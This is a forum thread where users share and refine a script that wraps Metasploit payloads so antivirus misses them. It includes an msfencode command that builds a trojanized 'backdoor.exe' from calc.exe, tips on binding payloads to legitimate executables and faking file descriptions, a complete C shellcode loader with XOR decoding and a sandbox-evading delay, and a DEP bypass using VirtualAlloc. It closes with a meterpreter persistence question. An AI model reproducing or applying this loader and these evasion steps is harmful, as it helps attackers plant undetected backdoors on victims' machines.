[script] for AV evasion

[samiux]

@LHYX1,

First of all, I have tried to bind your script generated payload with other executable file. However, I do not like the result of the new binded executable file as the file description is missing.

If it is possible to inject your script generated payload (which is before compiled with gcc) to the executable file with msfencode with -k switch? I think that the msfencode method is the most perfect one. Or, can we make change to the msfencode template for that purpose? I have no idea on msfencode, so that I raise the question here.

Samiux

[L21ZIFER]

@samiux,
could you exactly tell how the results were? Did the AVs notice anything - did the binded result even launch like the legit part of the .exe (the calculator.exe for instance) work?

Did you test this command?
~/rt$ ./msfencode -t exe -x calc.exe -k -o backdoor.exe -e x86/shikata_ga_nai -c 5<br>

where backdoor.exe is the already stealthy-exe.

[LHYX1]

@samiux you can add a description and all that stuff to the binded exe file with resource hacker like I said in one of my previous posts.
And btw did you try to use iexpress already ?
If you still don't like the result, you can try to get it to work with msfencode but then you are going to have to adjust the code and so on...
Or you could write your own tool to accomplish this.

[samiux]

@L21ZIFER,

LHYX1's generated exe file does not detected by major anti-viruis programs so far. His work is great. Your mentioned msfencode command cannot inject his generated exe to calc.exe by the said command. By the way, the binded exe file (with Easy Binder) works great except the file description.

@LHYX1,

I am not very familiar with Windows system. Can you give me some hints to use with IExpress or Easy Binder with the your previous post? I prefer Easy Binder, thanks. Your work is great, I love it very much.

Samiux

[npavlidis]

@LHYX1 Many thanks for the script first of all. Tested it and worked with Win7 and XP.
The problem is that it does not seem to work with Windows 2008 or Windows 2003 though.
The exe runs with no issues but occupies one cpu core and then fails.

Any ideas/thoughts would be much appreciated.

Cheers,

Nik

[LHYX1]

@npavlidis I don't have Windows 2008 or Windows 2003 so I cant test anything.
I suppose the metasploit payloads work if you don't encode them with my script on these systems ?

This might have something to do with the decrypting for loops.
Try changing structure.c to this:
(I removed the long for loops to throw of the av's)

Code:

#include <stdlib.h>
#include <stdio.h>
#include <windows.h>
#include <time.h>

int main(){
char junkA []= %s;
unsigned char payload[] = %s;
char junkB []= %s;
unsigned char key = %s;
unsigned int PAYLOAD_LENGTH = %s;
int i;
unsigned char* exec = (unsigned char*)malloc(PAYLOAD_LENGTH/2);
unsigned char* unpack = (unsigned char*)malloc(PAYLOAD_LENGTH/2);
int z, y;
int devide;
int x = 0;
time_t start_time, cur_time;

time(&start_time);
do
{
time(&cur_time);
}
while((cur_time - start_time) < 2);

for(i=0; i<PAYLOAD_LENGTH; i++)
{
devide = %s
if(devide == 0)
{
unpack[x]=payload[i];
x++;
}
}

for(i=0; i<PAYLOAD_LENGTH/2; i++)
{
    exec[i]=unpack[i]^key;
}

((void (*)())exec)();

return 0;
}

Try playing a little with this c file and see what you can execute and what you can't execute.

[jnpa123]

npavlidis,
in windows servers default DEP policy is OptOut not OptIn like win 7/xp.
DEP prevents the execution of the code stored in memory with malloc function, therefore you must change DEP policy or change the function used to store the code. I tried using VirtualAlloc and it worked fine on windows server 2003.
hope i've helped
sorry about my bad english

[jnpa123]

in windows servers default DEP policy is OptOut not OptIn like win 7/xp.
DEP prevents the execution of the code stored in memory with malloc function, therefore you must change DEP policy or change the function used to store the code. I tried using VirtualAlloc and it worked fine on windows server 2003.
hope i've helped
sorry about my bad english

[LHYX1]

@jnpa123 did not know that.
thanx for the info

[n4ngai]

i keep getting the same error when trying to run any meterpreter scripts via a reverse_http session (payload option 7 - windows/meterpreter/reverse_http), i get a meterpreter session and try and run a script (persistence for example) and get this error:

"Error in script: NoMethodError undefined method `config' for nil:NilClass"

can anyone help me with this issue?